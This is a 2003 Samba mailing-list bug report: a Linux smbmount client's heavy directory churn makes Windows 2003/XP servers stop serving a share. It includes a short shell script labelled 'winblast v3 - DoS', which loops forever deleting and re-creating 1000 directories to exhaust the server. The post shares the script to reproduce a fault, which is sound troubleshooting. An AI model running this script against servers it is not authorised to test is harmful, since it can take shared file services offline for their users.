[Samba] smbmount makes windows server stop serving.

Daniel Kabs daniel.kabs at mobotix.com
Thu Dec 11 12:42:23 GMT 2003

Hello,

I've encountered a strange problem mounting a Windows server share.
My setup: Debian Linux, smbmount 3.0.0beta2 and Windows 2003 Server.

When the client creates and deletes a lot of files on the server, the
server suddenly ceases serving, i.e. you can not access files nor list
directory contents any more.
Example:
knoppix:/mnt # ll /mnt/test
ls: /mnt/test: Cannot allocate memory

The only way to get the server working again is to reboot it. Rebooting
the client does not help.

If you want to try for yourself, check this shell script. The script will
create 1000 directories and then takes turns deleting and re-creating
them. There will be no more than those 1000 directories at any time.
After having created (and deleted) 3.5 millions directories the server
denies access to the share.

#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi

count=0

# using 'pathcount' directories
pathcount=1000

echo running \'winblast v3\' with $pathcount files in loop ...

while [ 1 ]; do
        p=$((pathcount*2-1))
        stop=$((pathcount-1))
        while [ "$p" != "$stop" ]; do
                dirname=wbst$p
                # delete old directory if it exists and exit on any error
                if [ -d $dirname ]; then
                        rmdir $dirname || exit 3
                fi;

                # generating directory and exit on any error
                mkdir $dirname || exit 1
                p=$((p-1))
                count=$((count+1))
        done;
        echo $count directories generated ...
done;
#-- end --

On the server the event log shows an error with event id 2020.

Btw, the problem also exists if I use smbmount version 2.2.2 or use
Windows XP as server.

Any idea on how to work around that problem?

Cheers
Daniel Kabs
Germany